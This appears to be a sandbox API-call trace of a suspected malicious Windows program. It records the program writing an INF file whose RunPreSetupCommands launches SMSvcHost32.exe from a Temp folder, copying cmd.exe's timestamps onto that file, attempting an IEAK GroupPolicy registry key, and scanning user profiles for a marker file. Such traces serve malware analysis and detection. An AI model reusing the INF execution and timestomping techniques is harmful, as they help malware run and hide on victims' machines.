	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] GetLastError () returned 0x6
	[0113.612] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.612] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.612] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.613] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.613] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.613] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.613] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.613] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.618] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.618] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.618] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.619] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.619] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.619] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.619] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.619] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.620] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.620] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.620] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.620] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0113.620] wsprintfW (in: param_1=0x3963d88, param_2="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = %s:2\r\n\r\n[%s]\r\n%s\r\n" | out: param_1="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = dsnchufmmwncnnocjjnninwtsxtlmgnpjrfnhu:2\r\n\r\n[dsnchufmmwncnnocjjnninwtsxtlmgnpjrfnhu]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n") returned 278
	[0113.620] lstrlenW (lpString="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = dsnchufmmwncnnocjjnninwtsxtlmgnpjrfnhu:2\r\n\r\n[dsnchufmmwncnnocjjnninwtsxtlmgnpjrfnhu]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n") returned 278
	[0113.621] StrDupW (lpSrch="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0113.621] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x35
	[0113.621] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf", lpDst=0x39c59e0, nSize=0x35 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf") returned 0x35
	[0113.621] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690
	[0113.621] GetSystemTime (in: lpSystemTime=0x29afe54 | out: lpSystemTime=0x29afe54*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0xd, wHour=0xe, wMinute=0x2, wSecond=0x11, wMilliseconds=0x35d)) 
	[0113.621] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afe98 | out: lpFileTime=0x29afe98) returned 1
	[0113.621] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea0 | out: lpFileTime=0x29afea0) returned 1
	[0113.621] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea8 | out: lpFileTime=0x29afea8) returned 1
	[0113.621] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x1c
	[0113.621] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x396a2c8, nSize=0x1c | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c
	[0113.621] CreateFileW (lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x698
	[0113.622] GetFileTime (in: hFile=0x396a2c8, lpCreationTime=0x29afe98, lpLastAccessTime=0x29afea0, lpLastWriteTime=0x29afea8 | out: lpCreationTime=0x29afe98*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastAccessTime=0x29afea0*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastWriteTime=0x29afea8*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2)) returned 0
	[0113.622] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afe98 | out: lpFileTime=0x29afe98) returned 1
	[0113.622] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea0 | out: lpFileTime=0x29afea0) returned 1
	[0113.622] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea8 | out: lpFileTime=0x29afea8) returned 1
	[0113.622] CloseHandle (hObject=0x698) returned 1
	[0113.622] WriteFile (in: hFile=0x690, lpBuffer=0x729e28*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x29afeb0, lpOverlapped=0x0 | out: lpBuffer=0x729e28*, lpNumberOfBytesWritten=0x29afeb0*=0x116, lpOverlapped=0x0) returned 1
	[0113.622] SetEndOfFile (hFile=0x690) returned 1
	[0113.624] SetFileTime (hFile=0x690, lpCreationTime=0x29afe98, lpLastAccessTime=0x29afea0, lpLastWriteTime=0x29afea8) returned 1
	[0113.624] FlushFileBuffers (hFile=0x690) returned 1
	[0113.843] CloseHandle (hObject=0x690) returned 1
	[0113.846] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf023f, lpSecurityAttributes=0x0, phkResult=0x29afd8c, lpdwDisposition=0x0 | out: phkResult=0x29afd8c*=0x0, lpdwDisposition=0x0) returned 0x5

Thread:
	id = 104
	os_tid = 0x904

	[0088.107] GetProfilesDirectoryW () returned 0x0
	[0088.108] GetProfilesDirectoryW () returned 0x1
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0x653638
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.108] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0088.109] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] GetLastError () returned 0x7a
	[0088.109] lstrcmpW (lpString1="..", lpString2=".") returned 1
	[0088.109] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0088.109] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0088.109] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] lstrcmpW (lpString1="All Users", lpString2=".") returned 1
	[0088.110] lstrcmpW (lpString1="All Users", lpString2="..") returned 1
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.110] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.111] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.112] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.113] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] GetLastError () returned 0x7a
	[0088.114] wsprintfW (in: param_1=0x69db50, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0088.114] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0088.114] GetLastError () returned 0x3
	[0088.114] GetLastError () returned 0x3
	[0088.114] GetLastError () returned 0x3
	[0088.114] GetLastError () returned 0x3
	[0088.114] GetLastError () returned 0x3
	[0088.114] GetLastError () returned 0x3
	[0088.114] GetLastError () returned 0x3
	[0088.114] GetLastError () returned 0x3
	[0088.114] GetLastError () returned 0x3
	[0088.114] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.115] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] wsprintfW (in: param_1=0x69db50, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0088.116] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0088.116] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.116] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] lstrcmpW (lpString1="Default", lpString2=".") returned 1
	[0088.117] lstrcmpW (lpString1="Default", lpString2="..") returned 1
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
